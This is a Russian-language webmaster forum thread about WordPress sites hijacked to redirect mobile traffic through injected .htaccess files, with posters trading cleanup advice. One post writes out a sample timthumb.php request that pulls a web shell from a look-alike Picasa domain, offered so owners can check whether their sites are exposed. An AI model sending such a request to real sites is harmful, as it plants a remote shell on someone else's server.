Уязвимость WordPress

123
TF-Studio
На сайте с 17.08.2010
Offline
334
#11

логи нужны.

тогда и дыру можно будет найти.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#12

Логи наши други - це факт. ТС, скока весит файл с логами(все не надо, надо с момента "болезни" сайта)? В принципе можете выложить на ФО сами логи, а нам дать ссылку. Думаю, так будет быстрей:)

Подпись))
OL
На сайте с 28.11.2009
Offline
81
#13

Как вариант поставить права 444 на .htaccess, если не стоит.

И искать shell :)

um-seo
На сайте с 20.02.2008
Offline
109
#14

Наблюдаю пару дней топик, дай думаю, пару часов назад, проверю свои сайты! Каково было мое удивление, когда я увидел, что ВСЕ сайты были прохаканы аналогичным способом, кто то спокойно лил мобильный трафик...... :)

Покупаю мобильный трафик на очень привлекательных условиях! Все подробности в ЛС. За большой объем vip условия.
E
На сайте с 27.07.2008
Offline
68
#15
OpeL73rus:
Как вариант поставить права 444 на .htaccess, если не стоит.

Он их и с этими правами и сам ставит замечательно. Его не останавливает.

Все совпадения случайны, имена и даты высосаны из пальца и значения не имеют.
R
На сайте с 24.01.2008
Offline
180
#16
um-seo:
Наблюдаю пару дней топик, дай думаю, пару часов назад, проверю свои сайты! Каково было мое удивление, когда я увидел, что ВСЕ сайты были прохаканы аналогичным способом, кто то спокойно лил мобильный трафик...... :)

А может у вас на сайтах не только мобильный траф лили? У кого проблемы стучите проверим на вирусы и др. вредоносные скрипты = дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
S
На сайте с 12.05.2010
Offline
71
#17

На фтп пароли сперли скорей всего. У меня такое с джумлой было. В конце index.php дописывалась всякая хрень. Сменил пасы и все ок.

6666
На сайте с 10.01.2005
Offline
505
#18

Та же фигня. Пассы ФТП менял, без толку ( Загадили не только вордпрессы, но и все соседние сайты, даже чистую статику.

---------- Добавлено 01.11.2012 в 02:26 ----------

errora:
Его не останавливает.

блин... тоже всем 444 поставил.. :)

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
S
На сайте с 06.09.2012
Offline
15
#19

Проверьте у себя в шаблонах, нет ли там папка scripts с файлом timthumb.php ?

обычно можно этот баг использовать чтобы залить веб шел к вам на хост.

выглядит по типу:

/wp-content/themes/blablabla/scripts/timthumb.php?src=http://picasa.com.dom.com/shell.php

Дело в том, что тот скрипт может закачивать файлы с picasa.com, но он не контролирует данный процесс точности домена, если у вас можно так закачать файл то проверяйте в тойже папки scripts папку cache на наличие в ней файлов с расширением .php

Если нашли и получается таким образом закачать файлы на хост, то обновляйте движок и все возможные плагины.

______________________AMSTERDAM______________________ ISPmgr Lite / Pro - 3 / 5.5 EUR в месяц или 22 / 40 EUR Вечная BILLmgr Stan / Advan - 6 / 10 EUR в месяц или 90 / 140 EUR Вечная
E
На сайте с 27.07.2008
Offline
68
#20
6666:
Та же фигня. Пассы ФТП менял, без толку ( Загадили не только вордпрессы, но и все соседние сайты, даже чистую статику.

Ага, тоже все пароли меняла, вычищала. Началось все, кстати, с плагина на купленном сайте, назывался "mobi", если память не изменяет... проверьте на лишние :) Этот плагин не только в корни сайтов .htaccess лил, но и во все вложенные папки. После удаления через неделю было тихо, потом снова.

Rxp:
А может у вас на сайтах не только мобильный траф лили?

Мобильный в основном, еще какие-то переходы с некоторых полумертвых поисковиков вроде забирали. Сайты, на которые переправляет, кстати, постоянно меняются.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий